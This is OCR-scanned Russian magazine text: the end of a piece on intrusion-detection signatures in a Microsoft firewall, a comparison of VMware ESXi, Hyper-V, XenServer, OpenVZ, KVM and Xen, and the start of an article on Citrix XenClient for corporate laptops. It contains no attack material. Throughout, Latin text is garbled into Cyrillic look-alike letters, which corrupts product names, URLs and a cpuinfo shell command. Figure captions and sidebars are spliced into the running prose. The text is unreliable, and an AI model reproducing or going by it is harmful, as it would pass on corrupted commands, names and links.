на трафик КРС оѵег НТТР. Кроме того, можно пометить сигнатуру 
флагом — например, для обозначения сигнатур с настройками, 
отличными от настроек по умолчанию. В случае, если глобальная 
политика, задающая реакцию для новых сигнатур, отлична от 
значения Місгозой Ие&ик Роіісу, то новые сигнатуры автоматически 
помечаются флагами. Все настройки отдельных сигнатур и политик, 
которые были сделаны, сохраняются в случае выключения N15 и 
вступают в силу после повторного включения. 

В зависимости от настроек сигнатур феіесі: или Віоск) N15 может 
работать как ГО 5 или как ІР5. Для всех сигнатур рекомендуется 
оставлять настройки по умолчанию, так как в этом случае обеспе- 
чивается максимальный уровень безопасности. Менять настройки 
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рис. 7. Настройка N15 и отдельных сигнатур 




Рис. 6. Настройка реакции на аномалии протоколов 




рис. 8. Тестирование работы N15 
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рис. 9. Тестирование работы N15 



стоит в случае решения проблем с доступом или присутствия ложных 
срабатываний. 

Ложные срабатывания 

При наличии ложных срабатываний и блокировке разрешенного 
трафика следует перевести соответствующие сигнатуры в режим 
Пеіесі опіу и сообщить о проблеме в Рогеітопі ТМС Сизіотег Зиррогі. 
Кроме сигнатур, ложные срабатывания могут быть вызваны из-за 
включения блокировки аномалий. 

ММРС отслеживает ложные срабатывания, используя Теіетеігу 
Зегѵісе. В случае их обнаружения создается исправленная сигна- 
тура, которая повторно тестируется и публикуется для замещения 
предыдущей версии. 

Итоги 

При включении N18, регулярном обновлении сигнатур и использо- 
вании политик по умолчанию можно значительно снизить риск ис- 
пользования злоумышленником уязвимостей, которые присутству- 
ют в сети. Цена — как обычно: производительность и вероятность 
блокировки разрешенного трафика, ил 
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Параллельный мир 

Сравниваем возможности виртуальных машин 

Производительность современных компьютеров давно уже превосходит стандартные потребно- 
сти большинства организаций и отдельных юзеров. И все чаще вместо нескольких серверов место 
в стойке занимает один единственный, который затем уже «нарезается» на несколько машин. С 
выбором железа обычно проблем нет, а вот систему виртуализации подобрать сложнее. 



ѴЛЛѵѵаге Е5ХІ 

Все, кто работал с виртуальными машинами с начала века, хоро- 
шо знает продукты ѴМѵѵаге, пользовавшиеся популярностью бла- 
годаря своим функциональным возможностям и производитель- 
ности. Да и сегодня на десктопах нередко можно найти ѴМѵѵяге 
ѴѴогкБіаііоп и ѴМѵѵаге Ріауег. Последний появился как ответ М3 
ѴігШаІ РС и является бесплатной версией ѴѴогкБІагіоп. Работает 
он из-под установленной ОС, то есть к промышленной среде не 
совсем подходит. Для установки на «голое железо» предлагается 
ѴМѵѵаге ЕЗХі - самостоятельный продукт, являющийся основой 
для установки гостевых ОС, а совместно с ѴМѵѵаге ѵЗрЬеге — сред- 
ством для построения виртуальной инфраструктуры и управле- 
ния виртуальными ресурсами (подробнее в статье «Виртуальная 
сфера», см. ] [ 08.2010). По сути, Е5ХІ — это сильно урезанная 
версия Ілпих, содержащая гипервизор (ѴМкегпеІ) и консоли 
управления: ѵСІЛ (ѵЗрЬеге СІЛ), РоѵѵегСІЛ (РоѵѵегЗЬеІІ интерфейс 
к ѵСІЛ) , 88Н и ПСІЛ (ПігесИ Сопзоіе ІІзег Іпіегіасе) . 

Ранее Е8ХІ считался «младшим братом» в линейке продуктов 
ѴМѵѵаге, ведь он представляет собой бесплатный и урезанный 
вариант Е8Х. Но время Е8Х прошло, следующие версии ѴМѵѵаге 
ѴЗрЬеге будут включать поддержку исключительно Е8ХІ (пред- 
ложено также его альтернативное название — ѴМѵѵаге ѵЗрЬеге 
Нурегѵізог), а все преимущества Е5Х перед Е5ХІ сошли на нет. Так 
что разработчики рекомендуют переходить на Е8ХІ. 

Главное отличие Е8ХІ от Е5Х заключается в архитектуре. Основой 
Е5Х служит полноценная версия Ілпих, на которую можно уста- 
навливать при необходимости свои приложения. Агенты ѴМѵѵаге 
работают через С05 (Сопзоіе 08) , то есть через дополнительный 
уровень. В итоге мы имеем больший размер дистрибутива: ~2 
Гб по сравнению с 350 Мб у Е5ХІ (на хард ставится всего 70Мб) . 

В ЕЗХі агенты работают прямо в ѴМкегпеІ, при необходимости 
модули сторонних разработчиков (мониторинг, драйвера) также 
выводятся на гипервизор. Уменьшение слоев означает большую 
надежность и безопасность, меньше возможности для атак. 
Дистрибутив можно записать на флэшку или вообще вшить в 
Іігтѵѵаге сервера. Из-за некоторых особенностей официальный 
список совместимого оборудования у Е8ХІ Г с1ск.ги/9х1р) меньше, 
чем у Е5Х, который поддерживается и старыми серверами, но 
со временем он увеличится. Кроме того, добровольцами создан 
неофициальный список компьютеров Е5ХІ ѴѴЪііеЪох НСЬ ( сіск. 
ги/9хпР) , на которых работает ѴМѵѵаге Е8ХІ. Системы из этого 
списка используются на свой страх и риск, но обычно проблем не 
возникает. 

Продукт от ѴМѵѵаге отличает поддержка большого количества 
гостевых ОС. Здесь полный фарш — ѴѴіпсіоѵѵб, Ілпих, Зоіагіз, 
ЕгееВЗР, Иеіѵѵаге и многие другие, весь список доступен на сайте. 
Функциональность последних релизов Е5ХІ уже «подтянули» 
под возможности Е5Х — появилась интеграция с Асііѵе Пігесіогу 
(любая учетная запись будет проверяться в каталоге), функции 
расширенного управления памятью (неиспользованные ресурсы 



освобождаются), совместная работа с системами хранения 
данных ѴМѵѵаге ѵЗіога^е ѴМЕЗ/Зіога^е ѴМоІіоп и ЗАИ, настройка 
приоритетов трафика, технология безопасности ѴМзаІе Зесигііу 
АРІ. Гибкое распределение ресурсов позволяет «на горячую» до- 
бавить СРІІ, ОЗУ, жесткий диск (в том числе и изменить размер 
текущего без перезагрузки). Установка дистрибутива на голое 
железо очень проста (стандартный вариант с привода или через 
РХЕ), к тому же начиная с версии 4.1 поддерживаются сценарии, 
позволяющие автоматизировать процесс инсталляции ПО, на- 
стройку сети и подключения к ѵСепіег 8егѵег. Через ѴЗрЬеге АРІ 
интегрировано управление резервного копирования Е5ХІ. 
Немаловажно наличие специального конвертера ѴМѵѵаге 
ѵСепіег Сопѵегіег ( ѵтѵѵаге.сот/ргобисіБ/баіасепіег- 
ѵігіиаіігаііоп/сопѵегіег) , позволяющего использовать в Е8ХІ 
образы М8 Ѵігіиаі Зегѵег, Ѵігіиаі РС, Нурег-Ѵ, а также физические 
серверы и образы дисковых разделов, созданных такими про- 
граммами как Асгопіб Тгие Іта^е, Ыогіоп СЬобі и другими. 

Кроме этого, помочь в развертывании ЕЗХі может и бесплатный 
веб-сервис ѴМѵѵаге Со ( го ; ѵтѵѵаге .сот) , позволяющий протести- 
ровать физический сервер на совместимость, установить ЕЗХі и 
создать новые ѴМ. 

М5 Нурег-Ѵ 

Технология виртуализации от М3, финальная версия которой 
выпущена летом 2008 года. С выходом ѴѴт2к8К2 Нурег-Ѵ получил 
новые возможности — Ілѵе Мі^гаііоп, динамическая память, 
улучшены ряд инструментов и поддержка оборудования. 

Нурег-Ѵ построен по принципу гипервизора с микроядром и 
напрямую «общается» с оборудованием сервера на Кіп§-1. Это 
уменьшает расходы, благодаря чему достигается высокая ско- 
рость работы. Предлагается в двух вариантах — как роль ѴѴіпсіоѵѵб 
Зегѵег 2к8/К2 (доступна в полном варианте и Зегѵег Соге) или 
как отдельное решение для установки на «голое железо» — М3 
Нурег-Ѵ Зегѵег 2008 К2 ( тісгоБОІІ.сот/Ьурег-ѵ-Бегѵег) . Последний 
распространяется бесплатно (не требует Сііепі АссеББ ІлсепБе), 
лицензия понадобится лишь для гостевых ѴѴіпсіоѵѵб. По сути, 
это урезанный вариант Зегѵег Соге, в котором установлена одна 
роль (без возможности изменения) и ограничены инструменты 
управления. 

Кроме лицензии, между разными вариантами Нурег-Ѵ есть и 
другие отличия, но в бесплатном варианте доступно все необхо- 
димое для построения сервера виртуализации. Это поддержка 
технологии Ьіѵе Мі^гаііоп, консолидация серверов и кластериза- 
ция узлов. 

Сервер, на который устанавливается М3 Нурег-Ѵ Зегѵег, может 
иметь ОЗУ в 1 Тб и до 8 СРІІ, чего вполне достаточно для задач не- 
большой и средней организации. 

Официально поддерживаются 32- и 64-битные версии ѴѴіпсіоѵѵб 
ХР ЗРЗ, ѴІБІа ЗР2/2кЗ ЗР1/2к8 и Ілпих (ЗЬЕЗ и КНЕЬ) . Но в ин- 
тернете можно найти десяток руководств, в которых описана 
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Бесплатный ХепЗегѵег 



ХепЗегѵег (текущая версия 5.6.1 ) в чем-то похож на ѴМѵѵаге 
Е5ХІ. Предоставляется он бесплатно, и его можно использовать 
без ограничений. Но для централизованного управления 
фермой серверов предлагается ХепСепІег, продаваемый 
под собственнической лицензией Сіігіх. Функционально 
ХепЗегѵег — очень мощный инструмент. Админ получает 
неограниченное количество серверов и виртуальных машин; 
І_іѵе Моііоп ; непрерывное обслуживание при условии, что 
ресурсы нескольких серверов объединены в пул; контроль 
доступа на основе ролей (ПВАС) и интеграцию с Асііѵе Оігесіогу; 
динамическое управление памятью, позволяющее добавить 
ПАМ в ѴМ без перезагрузки. Рабочая нагрузка динамически 
перераспределяется не только между виртуальными, но и 
между физическими серверами, что существенно упрощает 
управление. Спроектирован с учетом требований по 
предоставлению высокого уровня доступности системы (НідЬ 
АѵаіІаЬІІіІу). Рабочую ОС, установленную на любом физическом 
сервере, можно легко конвертировать в виртуальную систему. 
Умеет работать с основными системами хранения данных 
(локальный диск, ЫАЗ, ЗАЫ и так далее). Экспериментально 
может работать с образами дисков в форматах ѴМѴѴаге ѴМйК, 
М5ѴЕЮ, Ш, ѴѴІМ. 

Официально в качестве гостевых систем поддерживаются все 
версии ѴѴіпсІоѵѵз, начиная от ѴѴіп2к 5Р4, Ыпих (5І_Е5, ННЕІ_/Сеп- 
105, Огасіе ЕІ_, Зоіагіз, ОеЬіап). Гостевая система поддерживает 
до 64 логических процессоров, 256 Гб оперативной памяти и 16 
сетевых адаптеров на хост. Хотя характеристики виртуальной 
машины будут зависеть от используемой гостевой ОС, ѴМ не 
имеет ограничений на количество используемой оперативной 
памяти: все, что сможет выдать сервер, будет доступно. 



успешная эксплуатация других версий *піх — ІЛшпШ, РгееВЗН и 
так далее . Для установки рекомендуется выбирать дистрибутивы 
Ыпих с ядром 2.6.32 + , в котором добавлена поддержка Нурег-Ѵ 
(ІлпихІС, распространяется М3 под СРЬ). Правда, только гостевые 
ѴѴіп2к8 могут быть сконфигурированы с 4 ѵСРЕГ 
Для установки М3 Нурег-Ѵ Зегѵег потребуется компьютер с х64 
СРІф поддерживающий технологии ІпГеІ ѴТ или А1ѴГО-Ѵ, и мини- 
мум 1 Гб НАМ. 

Для управления большими массивами виртуальных серверов 
М3 предлагает отдельный продукт Зузіет Сепіег ѴігШаІ МасЫпе 
Мапа^ег 2008 (ЗСѴММ 2008) , имеющий инструменты для Р2Ѵ- 
(Рйузісаі Го ѴігШаІ) и Ѵ2Ѵ-конвертирования серверов (с ѴМѵѵаге). 
Опять же, в списке поддерживаемых для Р2Ѵ только ѴѴіп. Поэто- 
му, чтобы перенести свой сервак, работающий на Ілпих, при- 
дется выбрать длинный путь: ѴМѵѵаге ѵСепіег СопѵеПег ЕЗХі 
ЗСѴММ -> Нурег-Ѵ. Не всегда данный процесс проходит гладко, 
особенно для дистрибутивов, не поддерживаемых официально. 

В этом случае безопасней установить систему вчистую, а затем 
перенести данные из бэкапа. Вместо ЗСѴММ в этой связке можно 
использовать бесплатный ѴМНК2ѴНО ( ѵтШоІкіі.сот/Шез) , Сіігіх 
ХепСопѵегі, С^иеві: ѵСопѵегіег ( диезі.сот/ѵсопѵегіег) . 

ОрепѴІ 

ОрепѴ2 Г ОрепѴХ.ощ) представляет собой расширение к ядру 
Ілпих, реализующее концепцию виртуального окружения (ѴігШаІ 
Епѵігоптепіз) . Ядро базового дистрибутива одно на всех, вир- 
туализация производится на уровне экземпляров ОС. Именно 
поэтому в качестве гостевых можно использовать только Ілпих. 
Конечно, это несколько сужает сферу его применения. 

Каждый из «дистрибутивов» изолирован и работает в своем 
адресном пространстве, реализовано управление ресурсами и 
сохранение текущего состояния каждого виртуального сервера. 
Такой подход практически не сказывается на производительно- 
сти (накладные расходы не выше 1-3%) . Зато в ресурсах админ 
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Поддержка виртуализации при установке СепЮБ 



практически не ограничен — до 64 Гб НАМ, 4096 СРІІ и так 
далее. При установке создается виртуальное сетевое устройство 
(ѵепеі) , которое дает возможность задать для каждой ѴМ свои 
сетевые настройки (ІР и правила маршрутизации) . Собствен- 
но, отсутствие каких-либо ограничений на ресурсы (кроме тех 
ограничений, которые связаны с возможностями физического 
сервера) делают ОрепѴ2 популярным у хостеров, да и у админов, 
юзающих Ілпих. 

Гостевые ОС обычно разворачиваются при помощи подготов- 
ленных контейнеров ОС. Администратор указывает доступные 
ресурсы и дисковые квоты (по іпосіез и/или объему), создавая 
шаблоны, которые и становятся основой ѴМ. Такой подход очень 
упрощает процесс при создании большого количества одно- 
типных ѴМ. Причем контейнеры используются и при миграции 
(СЬескроіпііп^), когда замороженное состояние переносится на 
другой физический сервер. Этот процесс происходит «вживую», 
пользователи обычно замечают лишь увеличенное время от- 
клика. 

Проект предлагает несколько десятков шаблонов дистрибутивов 
( бомтІоаб.орепѵг.огг/сопІгіЬДетрІаіе/ргесгеаіесі) , а поискав в 
интернете можно найти и дополнительные варианты. 
Управление ОрепѴ2 производится при помощи пакета ути- 
лит ѵгсіі (Ѵ2ІІ5І:, ѵгті^гаіе, ѵгсаіс, ѵгсі^ѵаіісіаіе, ѵгтетсЬеск, 
ѵгсрискеск, ѵгрісі, ѵгзрііі и других) . Для удобства админы создают 
скрипты, хотя сегодня доступен ряд интерфейсов, делающих про- 
цесс управления ОрепѴ2, КѴМ и Хеп (о них ниже) более нагляд- 
ным — ѴѴеЪѴ2 ( ѵѵеЪѵг.зГпеі:) , Кіохо (она используется в спецди- 
стрибутиве Ргохтох ѴЕ) и НурегѴМ. 

Традиционно ОрепѴ2 является «домашней» системой виртуали- 
зации для дистрибутивов, базирующихся на ПеЫап. 

КѴМ 

Технология виртуализации КѴМ (КегпеГЪазес! ѴігШаІ МасЫпе) 
продвигается компанией КесІНаІ и является «основной» в этом 
дистрибутиве и его клонах. Требует поддержку аппаратной 
виртуализации ІпГеІ ѴТ или АМЭ V. Это означает, что КѴМ может 
использоваться далеко не на каждом компьютере: старые и 
некоторые из новых СРІІ (например, ІпГеІ Аіот) не подойдут. В 
принципе, если оборудование закупается под задачу — это не 
проблема. Проверить очень просто: 



$ е§гер ' л Па§5 . *(ѵтх | 5ѵт) ' /ргос/сриігѵРо 

Распространяется он по лицензии С1МІІ СРЬ, компании КесІНаІ: и 
Ыоѵеіі предоставляют коммерческую поддержку. 

Реализован в виде базового модуля ядра (кѵт.ко) и изегзрасе. 




Настройки виртуальной машины в АОЕЛЛІІ 




Создаем контейнер в ОрепѴІ 



Последний представляет собой модифицированный (^ЕМЕТ 
( дети.опП , предназначенный для эмуляции аппаратного обе- 
спечения. В зависимости от типа СРІІ грузится и специфический 
модуль — кѵт-атсі.ко или кѵт-іпіеі.ко. Для настройки вирту- 
альных машин используется псевдоустройство /беѵ/кѵт. Все 
инструкции выполняются в специальном гостевом режиме, в 
полностью изолированном от системы и друг от друга адресном 
пространстве. Ввод-вывод сетевых, блочных и Ъаііооп (работа с 
памятью) устройств реализован через драйвер Ѵігііо, остальные в 
изегзрасе. Накладные расходы выше, чем у ОрепѴ2, и, в зави- 
симости от задач, могут быть до 20%. Но у КѴМ есть несомнен- 
ный плюс — в качестве гостевых можно запускать Ілпих, *В8П, 
ѴѴіпсіоѵѵб, Воіагіз, Мае 05 X и ряд других ОС. Гостевые системы 
ограничены фактически ресурсами сервера, каждая может иметь 
до 16 ѵСРІІ (некоторые ОС, вроде ѴѴіпХР, предварительно следует 
специфически подготовить) . К слову, опыт показывает, что если 
в качестве гостевой используется Ілпих, то лучше выбрать такой 
же дистрибутив, как и базовая система. Производительность и 
стабильность работы будут заметно выше. 

Удобно, что КѴМ поддерживает ѵтсік-образы, созданные в 
ѴМѴМаге, процесс переноса очень прост и хорошо описан в соот- 
ветствующем НОѴѴТО ( с1ск.ш/9х1р) . 

Учитывая, что КѴМ включен в состав ядра Ілпих начиная с версии 
2.6.20 (раньше, чем другие системы виртуализации), проблеме 
установкой ни для одного из дистрибутивов нет. 

В КѴМ поддерживается заѵеѵт/іоасіѵт, оШіпе и «живая» мигра- 
ция виртуальных машин (последние — через команды ті^гаіе*) . 
Основным условием успешного переброса хоста является иден- 
тичность оборудования (тип СРІІ) и настроек гостевой системы, 
в том числе и пути к файлам образов. Хотя в некоторых случаях 
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Нурег-Ѵ можно установить как одну из ролей 
\Л/іп2к8 

можно перенести ОС и без полного соответствия, но 
это потребует больше трудов и увеличивает вероят- 
ность ошибки. Гостевые ОС легко клонируются: один 
раз создав шаблон, его легко размножить. 
Конвертирование Р2Ѵ возможно двумя способами. 
Первый через сМ, как описано в документации (^ЕМЕТ, 
но стандартной такую операцию назвать нельзя. 
Второй — применить ѴМѴѴаге Сопѵегіег. 

Так как КѴМ основан на (^ЕМЕТ (оба проекта тесно 
связаны друг с другом), то принципы управления (в 
частности, создания образов) остались те же. Для 
загрузки новой гостевой ОС через /беѵ/кѵт использу- 
ется специальная утилита кѵт. 

Управление осуществляется при помощи фронт-энда 
ѵіпмпапа^ег, разработанного КебНаі:, или утилит 
командной строки ^ети* и кѵт. Чаще всего админы 
для удобства используют скрипты (на сайте проекта 
можно найти несколько заготовок) . 

Также доступны и интерфейсы: кроме тех о кото- 
рых говорилось выше, это Кагезашиі (Хеп/КѴМ), 
ЗутЪоІіс, СопѴігІ (Хеп/КѴМ), Сапеіі (Хеп/КѴМ). 

Хеп 

Популярный гипервизор начал свой путь в конце 90-х, 
в недрах компьютерной лаборатории Кембриджского 
университета, и был доступен по СЖІ СРЬ. Первый 
публичный релиз вышел в 2007 году. Со временем 
была образована компания ХепЗоигсе, выкупленная 
чуть позже Сіігіх, который создал на его основе свой 
Сіігіх ХепЗегѵег (СепЮ5 + Хеп). Кроме того, гиперви- 
зор Хеп используется в Огасіе ѴМ. Но изначально все 
новшества появляются в Хеп, и только через некото- 
рое время — в сторонних продуктах. 

Относительно недавно проект начал разработку плат- 
формы облачных вычислений Хеп Сіоисі РІаІІогт. 

Хеп можно назвать универсальным, так как помимо 
поддержки полной (аппаратной) виртуализации 
(НѴМ, Нагсйѵаге Ѵігіиаі МасЫпе) реализован режим 
паравиртуализации (РѴ) . А значит, мы можем за- 
пустить его на сервере, не имеющем СРІІ с ІШ:е1-ѴТ и 
АМП-Ѵ, но для этого требуется модифицированная 
версия ОС. К слову, именно разработчики Хеп ввели в 
свет термин «паравиртуализация». 

Код гипервизора и сопутствующих модулей сделан 
переносимым, в итоге Хеп поддерживает несколько 
архитектур: х86, х86_64, ІІапішп, Роѵѵег РС и АКМ, хо- 
стовые ОС — Ілпих, ЫеіВЗП и ЕгееВЗП. Первые релизы 
гипервизора были внедрены и в ѴѴІпХР, однако конеч- 




Шаблоны ОС в СопѴігі 




Установка параметров ѴМ в Кагезапзиі 



ное решение так и осталось экспериментом. В каче- 
стве гостевых ОС можно установить Ілпих, ЫеіВ8П, 
ЕгееВЗО, Зоіагіз и ѴѴіпсІоѵѵз. Производительность 
гостевых систем близка к работе непосредственно 
на железе, максимальные потери — до 8%. Поддер- 
живаются Ьіѵе Мі^гаііоп, изменение размеров диска, 
использование гостевой ОС видеокарты напрямую, 
задействование неиспользуемой памяти гостевых си- 
стем, синхронизация состояния ѴМ между серверами 
(Кетиз Еаик Тоіегапсе) , доступ к ІІЗВ-устройствам. 
Процессы гостевых ОС полностью изолированы друг 
от друга, не могут использовать привилегированные 
инструкции (такие обращения отправляются непо- 
средственно гипервизору). 

В версии 4.1 физический сервер может иметь > 255 
СРІІ, 1 Тб КАМ, а гостевая система — до 128 ѵСРЕІ; 
доработано управление пулами СРІІ и теперь каждый 
пул может работать со своим планировщиком. 

В ядре ѵапіііа Ілпих Хеп «поселился» с версии 2.6.37, 
хотя в некоторых дистрибутивах Ілпих он уже давно 
поддерживался «из коробки». 

Управление производится при помощи пакетов 
хеп-иіііз, хеп-іооіз, плюс доступно несколько интер- 
фейсов. Кроме тех, о которых говорилось выше, сюда 
можно добавить ѵігІ-тапа§ег, А(ЗЕМІІ, ОрепС^КМ, Хеп 
ОгсЬезІга, 2епіШс, хпСОКЕ и некоторые другие. 

Заключение 

Победителя в этом обзоре не будет. Каждое решение 
имеет свои плюсы и минусы, поскольку в различных 
ситуациях нам важны разные свойства. Потери в 
производительности достаточно малы, чтобы об- 
ращать на них внимание. Обычно все упирается в 
дисковую подсистему. Если планируется управление 
несколькими серверами, то при недостатке средств в 
первую очередь следует присмотреться к ОрепЗоигсе- 
решениям, имеющим многочисленные панели управ- 
ления. ПС 
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• Подробнее о 
ѴМѵѵаге ѵЗрбеге 
читай в статье «Вир- 
туальная сфера» , 
выпуск ][ 08.2010. 

• В отличие от В5СЮ 
ѴѴі псіоѵѵз, в Е5ХІ в 
случае ошибки вы- 
скакивает фиолето- 
вый Р5СЮ (Ригріе 
Зсгееп о! ОеаіЬ] . 

• Для управления 
большими массивами 
виртуальных серве- 
ров М5 предлагает 
Бузует Сепіег Ѵігіиаі 
МасЫпе Мападег 
2008. 

• В ядре Ыпих 
начиная с 2.6.32 до- 
бавлена поддержка 
Нурег-Ѵ. 

• Обзор популярных 
панелей ищи в статье 
«Правители виртуаль- 
ного мира», ][ 04.2010. 

• Подробнее о Сіігіх 
ХепЗегѵег читай в 
статье «Во власти 
гипервизора», ][ 
05.2009. 
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• Сайт ѴМѵѵаге: 
ѵтѵѵаге.ги : 

• страница М5 
Нурег-Ѵ Зегѵег 2008 
Р2: тісгозоК.сот/ 
Ьурег-ѵ-зегѵег ; 

• шаблоны для 
ОрепѴ/: сіоѵѵпіоасі. 
орепѵг.огд/сопІгіЬ/ 
Іетріаіе/ргесгеаіесі 
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Мобильный 

контроль 

Делаем «лично-корпоративные» ноуты и смарт- 
фоны пользователей безопасными 

В прошлой статье мы обсуждали встроенные и сторонние средства защиты для мобильных 
устройств. В этот раз попробуем решить проблему защиты мобильных рабочих станций с точки 
зрения создания системы с нуля. 



Комплекс продуктов и решений, которые будут здесь рассматри- 
ваться, нацелен преимущественно на средний бизнес. 

Этому есть две причины: крупные предприятия слишком 
инертны для внедрения новых решений, а у малых, как правило, 
недостаточно средств. 

Виртуализация 

Каждый из нас так или иначе сталкивался с различными видами 
виртуальных машин. Попробуем немного разобраться в их 
видах. 

Гипервизоры бывают первого и второго типов. Первый тип — 
это, фактически, мини ОС, загружаемая или устанавливаемая 
на сервер, позволяющая выделять и разделять ресурсы, обе- 
спечивать работу запущенных в ней ОС. Это ѴМѵѵаге Е5Х, Сйгіх 
ХепЗегѵег, МісгозоН Нурег-Ѵ. Гипервизоры второго типа — это 
ПО, исполняемое в ОС: ѴМѵѵаге ѴѴЪгкзіаиоп, Огасіе ѴігШаІ Вох и 
прочие. 

Вторые более знакомы рядовым пользователям, первые давно и 
эффективно решают множество задач на серверах. 

В этом нет ничего нового, слабые и сильные стороны каждого 
из типов гипервизоров хорошо известны нашим читателям 
(например, из статьи «Параллельный мир» этого же номера ] [) . 
Производительность ОС в гипервизорах первого типа практи- 
чески не отличается от производительности ОС, установленной 
на используемое железо — снижение производительности 
минимально. 

Для второго типа это не так, плюс доступ ко многим аппаратным 
функциям (например, использованию всех технологий видео- 
карт) сильно ограничен. Минусом гипервизоров первого типа 
является не слишком большое количество оборудования, с кото- 
рым они могут успешно работать. Как уже было сказано, первый 
тип — это мини-ОС, которым нужны драйверы и интерфейсы 
для работы с аппаратной частью компьютера. 

ѴТ-х? ѴТ-<І! 

За этими аббревиатурами скрываются технологии аппаратной 
виртуализации от компании Іпіеі. Первая технология (ѴТ-х) 
направлена на ускорение работы виртуальной ОС с гостевой и 
обеспечивает более быстрый доступ к памяти. Вторая (ѴТ-сІ) 
куда более значительна, она позволяет виртуальной машине 
получать прямой доступ к аппаратным ресурсам, в том числе и к 
системам ввода-вывода. 

С использованием ѴТ-б можно работать в виртуальной ОС без 
потери производительности, используя всю мощь аппаратных 
ресурсов. Это делает идею использования виртуализации в 
повседневной жизни весьма привлекательной. И дает возмож- 



ность использовать гипервизоры первого типа, давно работаю- 
щие на множестве серверов, на пользовательских компьютерах. 

Безопасность 

Казалось бы, мы отклонились от темы статьи. Причем здесь 
виртуализация и корпоративные ноутбуки? Однако предлагае- 
мое решение, используемое для защиты мобильных станций, 
непосредственно связано с виртуализацией. И ответственна 
за это компания Сйгіх, представившая свой продукт Хеп Сііепі:. 
Презентация продукта произошла еще летом 2010 года, однако 
сейчас он стал достаточно отшлифован, чтобы его можно было 
применить для решения различного рода задач. Что же это? Это 
гипервизор первого типа, предназначенный для установки на 
ноутбуки сотрудников. На нем может исполняться одна или не- 
сколько операционных систем. Это дает возможность работать 
за личным ноутбуком, безопасно используя рабочую и домаш- 
нюю среды. Даже одновременно. 

Как известно, одной из самых больших угроз безопасности рабо- 
чей информации как раз и является потеря или кража ноутбука 
(часто личного), на котором не действовали корпоративные 
политики и стандарты безопасности, а служебная информация 
все равно хранилась и обрабатывалась. 

Теперь возможно разрешать пользователям использовать для 
удаленной работы личный ноутбук, не опасаясь снижения 
уровня безопасности. «Корпоративная» ОС будет настроена и 
сконфигурирована согласно всем правилам, с использованием 
шифрования всего диска, разграничениями прав доступа, кор- 
поративным антивирусом и прочим ПО, с которым ты работа- 
ешь. В «домашней» же ОС все будет сделано так, как нравится 
пользователю, ведь необходимости хранить в ней важные 
данные нет. Работодатель сможет привлекать сотрудников 
покупкой для них ноутбука, который они могут использовать и 
дома, и в офисе, или, наоборот, поощрять сотрудников, которые 
принесут свой ноутбук на работу, что позволит сэкономить на 
парке машин. Хеп Сііепі: бесплатен, и его можно попробовать, 
скачав с официального сайта сйгіх.сот . 

Как это работает? 

Установка Хеп Сііепі: не отличается от установки любой ОС. По- 
сле установки можно подключиться к интернету. Требования к 
ноутбуку — поддержка технологии ІпТеІ ѴТ-сІ, реализованной в 
мобильных процессорах Соге і5-5хх и всех Соге і 7, а также новых 
процессорах из серии Запбу Вгісі^е Соге і5-25хх. Для корректной 
работы ЗЭ-приложений. . . ну, пока что, на момент написания 
статьи (конец апреля — прим, ред.), поддерживается только 
интегрированная графика — ІпТеІ СМА Х4500 или ІпТеІ СМА НЭ. 
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Не Хеп СІіепТ'ом единым 



Александр Лозовский, 
редактор рубрики ЗупАзк 



Стоит отметить, что кроме использования Хеп Сііепі необходимо 
использовать и традиционные корпоративные средства 
защиты — антивирусное ПО, брандмауэры, Ю5- и 01_Р-системы. 
Впрочем, рассматриваемая в статье технология позволяет все 
это «взять с собой». 



Недостатки Хеп СІіепІ 



У описанного продукта есть и недостатки. В основном они 
связаны с требованиями к аппаратной части ноутбуков и 
небольшим количеством поддерживаемых устройств. Из ОС 
поддерживаются почти все современные версии ѴѴіпсІоѵѵз 
(ХР-5еѵеп), неофициально можно заставить работать многие 
дистрибутивы І_іпих, особенно если для них есть Хеп Тооіз. Мае 
05 X не поддерживается. 

Это главный минус подобного решения, ведь любой гипервизор 
первого типа весьма требователен к железу. Однако продукт 
развивается, и велик шанс, что скоро мы увидим поддержку и 
других мобильных видеокарт. После установки можно выбрать, 
откуда устанавливать гостевые ОС. Для «домашней» ОС мы 
можем использовать образ 150 или диск, а для «корпоратив- 
ной» — специальное средство Сйгіх 5упсЬгопігег. Это позволяет 
загрузить готовую, полностью сконфигурированную и настро- 
енную ОС на свой ноутбук, а затем сразу приступить к работе. 
Для системного администратора — просто рай, этому ленивому 
дяденьке достаточно один раз подготовить шаблонные ОС для 
каждого отдела или группы пользователей, а не переустанав- 



Последние новости об утечках информации ярко высвечивают 
проблему, которая возникла, в общем-то, не сегодня. Да, 
каждый компьютерно-совместимый человек сегодня имеет по 
3-6 и более ЭВМ. Личный компьютер. Рабочий. Ноутбук. Нетбук. 
Планшет. Смартфон. Под компьютерно-совместимым человеком 
я имею в виду, естественно, нас с тобой — работников сферы ІТ, 
чья работа не заканчивается после 18:00, когда нормальному 
человеку можно положить метлу в шкаф, сдать бляху и фартук 
сменщику и идти снимать стресс. Мы должны быть всегда на 
связи и потому не делаем особой разницы между личными и 
рабочими компьютерами — почта и удаленные доступы у нас 
крутятся постоянно. Хотя почему айтишники? Сейчас этим 
грешат все — бухгалтеры, кадровики и даже сомнительные, 
непонятно чем занимающиеся менеджеры, которые тоже 
почему-то имеют ненормированный рабочий день. Результат 
описан в новостях — личные компьютеры не попадают под 
корпоративные политики безопасности, они дырявы, ничем 
не защищены, к ним имеют доступ все, кому не лень; ноутбуки 
и мобильники нередко пропадают — крадутся и теряются. 

В паблик утекают личные данные, контакты клиентов, базы 
данных бухгалтерии, теневые схемы и коррупционные проекты 
:). Поэтому обрати внимание на эту статью. Она — именно про 
то, как этого не допустить. 

ливать все на каждой конкретной машине. Получение вирту- 
альной машины осуществляется после ввода логина и пароля. 
И самое важное для корпоративной среды — администратор 
может пометить ОС как потерянную. В этом случае после вклю- 
чения утерянного сотрудником и найденного каким-нибудь 
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Корпоративные приложения — повсюду! 

нехорошим человеком ноутбука образ этой ОС будет удален при 
первом же подключении к интернету. Для каждой виртуальной 
системы администратор выставляет периодичность, с которой 
ОС должна проверять, не «потеряна» ли она. Например, двое 
суток. Если в течение двух суток ОС не имела доступ в интер- 
нет, она блокируется. В заданный промежуток пользователь 
может работать без подключения к интернету. Юзер должен 
подключиться к интернету, ввести учетные данные для Сйгіх 
ЗупсЬгопігег. Если администратор пометил в ЗупсЬгопігег, 
что компьютер потерян, данные с него автоматически удалят- 
ся, даже если на компьютере будет правильно введен пароль 
доступа к системе. Это важно, так как логин и пароль могут 
быть скомпрометированы. Сам контейнер с виртуальной ОС 
хранится на пользовательском ноутбуке в зашифрованном 
виде. Администратор может конфигурировать возможность 
использования системой различных устройств. Например, для 
